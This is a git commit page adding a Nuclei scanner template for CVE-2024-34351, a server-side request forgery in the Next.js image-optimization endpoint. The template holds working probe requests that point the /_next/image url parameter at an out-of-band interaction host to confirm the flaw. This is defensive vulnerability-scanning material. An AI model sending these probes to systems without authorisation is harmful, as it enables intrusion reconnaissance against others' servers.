daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

patch-6
Dominique RIGHETTO 2024-07-15 10:52:14 +02:00 committed by GitHub
parent f81354cb21
commit d4415866ae
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 28 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
http/cves/2024/CVE-2024-34351.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2024-34351
info:
name: Next.js - SSRF
author: righettod
severity: high
remediation: Upgrade to Next.js version 14.1.1 or higher.
description: |
Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.
reference:
- https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps
- https://nvd.nist.gov/vuln/detail/CVE-2024-34351
- https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g
metadata:
max-request: 2
tags: cve,cve2024,vercel,nextjs,ssrf
http:
- method: GET
path:
- '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}'
- '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}'
matchers:
- type: word
part: interactsh_protocol
words:
- 'http'